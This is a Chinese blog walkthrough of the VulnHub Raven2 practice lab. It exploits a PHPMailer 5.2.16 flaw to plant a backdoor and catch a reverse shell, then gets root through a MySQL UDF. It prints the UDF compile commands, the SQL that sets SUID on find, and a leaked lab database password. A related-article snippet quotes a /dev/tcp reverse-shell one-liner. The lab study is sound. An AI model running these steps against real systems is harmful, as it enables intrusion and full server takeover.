vulnhub靶场,Raven2

2024-01-20 07:50
文章标签 靶场 vulnhub raven2

本文主要是介绍vulnhub靶场,Raven2,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

vulnhub靶场,Raven2

环境准备

靶机下载地址:https://www.vulnhub.com/entry/raven-2,269/
攻击机:kali(192.168.58.130)
靶机:Raven2(192.168.58.157)
下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境,启动即可,将网段设置为NAT模式

信息收集

使用arp-scan确定目标靶机

使用nmap扫描查看目标靶机端口开放情况

开放端口:22、80、111、56784
浏览器访问目标靶机80端口

就是一个非常普通的页面,没有啥好利用的
网站目录结构扫描

dirb http://192.168.58.157/


只查看一级目录,然后挨个去访问试试
访问http://192.168.58.157/vendor/时,出现如下页面

然后挨个去查看,查看PATH文件时,成功获取到第一个flag

查看README.md文件,可以看到目标网站安装了PHPMailer

查看VERSION文件,可以看到PHPMailer版本为5.2.16

上面目录扫描发现下面还有一个wordpress的网站,访问试试

可以看到输入的IP变为一个域名了,肯定是域名重定向了
进入配置文件/etc/hots,进行配置

再次访问成功找到wordpress主网页

既然知道网站CMS为wordpress,那就使用wpscan扫描看看

wpscan --url http://192.168.58.157/wordpress/


就只知道了CMS的版本号,没有啥大用处
前面扫描发现网站安装了PHPMailer,在kali的漏洞库里搜索PHPMailer存在的漏洞

渗透过程

前面信息收集看到PHPMailer确实存在漏洞,然后这里使用40974.py
将攻击代码复制到本地

查看其内容,发现有几个位置是需要修改的
开头要加上

#!/usr/bin/python
# -*- coding: utf-8 -*-


防止乱码出现错误
然后在如下位置进行修改

保存后退出,这个存在漏洞的网页是在contact.php里,运行这个攻击文件会自动在网站根目录下面生成一个后门文件icepeak.php

这个错误是没有安装requests_toolbelt,使用pip install安装一下

这个提示是python3中已经安装了requests_toolbelt,所以使用python3去运行

python3 40974.py 


然后使用kali监听8888端口

浏览器访问后门文件

可以看到kali这边成功反弹到一个shell

使用find命令查找flag

find / -name flag*


成功找到flag2和flag3

权限提升

利用工具LinEnum(Linux枚举及权限提升检查工具)
下载地址:https://github.com/rebootuser/LinEnum

开启一个临时服务器

靶机使用wegt将LinEnum.sh下载到本地

给LinEnum.sh执行的权限

运行LinEnum.sh

可以看到mysql服务器是以root身份运行的
进入wordpress网站的根目录,查看wp-config.php的信息

可以看到里面放着mysql的账号和密码:root:R@v3nSecurity
登入mysql服务器,查看你mysql版本信息

网上搜索关键字

可以看到可以使用udf提权
kali漏洞库搜索udf

这里使用1518.c
将1518.c下载到本地

然后进行编译

gcc -g -c 1518.c 
gcc -g -shared -o icepeak.so 1518.o -lc
-g 生成调试信息
-c 编译(二进制)
-shared:创建一个动态链接库,输入文件可以是源文件、汇编文件或者目标文件。
-o:执行命令后的文件名
-lc:-l 库 c库名


开启一个临时服务器

靶机将icepak.so下载到本地

进入数据库,发现是具有读和写的权限的

use mysql; 
#进入数据库
create table foo(line blob); 
#创建数据表foo
insert into foo values(load_file('/tmp/icepeak.so')); 
#插入数据
select * from foo into dumpfile '/usr/lib/mysql/plugin/icepeak.so'; 
#( Foo表成功插入二进制数据,
然后利用dumpfile函数把文件导出
outfile 多行导出,dumpfile一行导出
outfile会有特殊的转换,而dumpfile是原数据导出
新建存储函数)
create function do_system returns integer soname 'icepeak.so'; 
#(创建自定义函数do_system 类型是integer,别名
soname文件名字然后查询函数是否创建成功)
select * from mysql.func;
select do_system('chmod u+s /usr/bin/find'); 
#(调用do_system函数来给find命令所有者的suid权限,使其可以执行root命令)
quit


退出mysql,使用/usr/bin/find提权

可以看到权限已经为root了,切换其根目录,发现最后一个flag,Raven2靶机所有flag查找完毕,至此,Raven2靶机渗透结束

这篇关于vulnhub靶场,Raven2的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/625275

相关文章

BUUCTF靶场[web][极客大挑战 2019]Http、[HCTF 2018]admin

目录   [web][极客大挑战 2019]Http 考点:Referer协议、UA协议、X-Forwarded-For协议 [web][HCTF 2018]admin 考点:弱密码字典爆破 四种方法:   [web][极客大挑战 2019]Http 考点:Referer协议、UA协议、X-Forwarded-For协议 访问环境 老规矩,我们先查看源代码

log4j靶场,反弹shell

1.用vulhub靶场搭建,首先进入目录CVE-2021-44228中,docker启动命令 2.发现端口是8983,浏览器访问http://172.16.1.18:8983/ 3.用dnslog平台检测dns回显,看看有没有漏洞存在 4.反弹shell到kali(ip为172.16.1.18)的8888端口 bash -i >& /dev/tcp/172.16.1.18

红日靶场----(四)1.后渗透利用阶段

使用Metasploit进入后渗透利用阶段     一旦我们获取了目标主机的访问权限,我们就可以进入后渗透利用阶段,在这个阶段我们收集信息,采取措施维护我们的访问权限,转向其他机器     Step01:上线MSF(通过metasploit获取目标系统的会话-即SHELL) 常用选项-p //指定生成的Payload--list payload //列出所支持的Payload类

【红日靶场】ATTCK实战系列——红队实战(一)手把手教程

目录 入侵网络的思路 一些概念 (1)工作组 (2)域 (3)账号 红日靶机(一) 网络结构 下载 配置web服务器的两张网卡 配置内网的两台机器(域控和域内主机) 渗透web服务器 外网信息搜集 (1)外网信息搜集的内容 (2)开始信息搜集(主要是利用工具) 漏洞利用 (1)漏洞利用的两种方式 (2)利用phpMyAdmin (3)开启3389端口远程桌面

tomato靶场攻略

1.使用nmap扫描同网段的端口,发现靶机地址 2.访问到主页面,只能看到一个大西红柿 3.再来使用dirb扫面以下有那些目录,发现有一个antibot_image 4.访问我们扫到的地址 ,点金目录里看看有些什么文件 5.看到info.php很熟悉,点进去看看   6.查看源代码发现是通过GET方式传参的 ,有文件包含漏洞 7. 利用文件包含漏洞,我们尝试查看一

Tomato靶场渗透测试

1.扫描靶机地址 可以使用nmap进行扫描 由于我这已经知道靶机地址 这里就不扫描了 2.打开网站 3.进行目录扫描 dirb    http://172.16.1.113 发现有一个antibot_image目录 4.访问这个目录 可以看到有一个info.php 5.查看页面源代码 可以发现可以进行get传参 6.尝试查看日志文件 http://172.16

攻防世界 —— 靶场笔记合集

靶场地址:https://adworld.xctf.org.cn/ 备注:此为靶场笔记合集的目录,是我接下来待更新的内容(主要是因为主线一篇太耗时间了,所以开通一条支线,来满足我日更两篇的目标,当该靶场更新完毕后,此条注释会删除) 0x01:Misc 0x02:Pwn 0x03:Web 0x0301:Web - Level 1 0x04:Reverse 0x05:Crypto

【靶场】upload-labs-master(前11关)

🏘️个人主页: 点燃银河尽头的篝火(●’◡’●) 如果文章有帮到你的话记得点赞👍+收藏💗支持一下哦 【靶场】upload-labs-master(前11关) 第一关 Pass-01第二关 Pass-02第三关 Pass-03第四关 Pass-04第五关 Pass-05第六关 Pass-06第七关 Pass-07第八关 Pass-08第九关 Pass-09第十关 Pass-10第

pikachu文件包含漏洞靶场通关攻略

本地文件包含 先上传一个jpg文件,内容写上<?php phpinfo();?> 上传成功并且知晓了文件的路径 返回本地上传,并../返回上级目录 可以看到我们的php语句已经生效 远程文件包含 在云服务器上创建一个php文件 然后打开pikachu的远程文件包含靶场,随便选一个提交 在filename处修改为云服务器的目标地址 127.0.0.1/pik

【靶场】CTFshow—vip限免题目11~20

🏘️个人主页: 点燃银河尽头的篝火(●’◡’●) 如果文章有帮到你的话记得点赞👍+收藏💗支持一下哦 【靶场】CTFshow—vip限免题目11~20 域名txt记录泄露敏感信息公布内部技术文档泄露编辑器配置不当密码逻辑脆弱探针泄露CDN穿透js敏感信息泄露前端密钥泄露数据库恶意下载 域名txt记录泄露 提示:域名其实也可以隐藏信息,比如ctfshow.com 就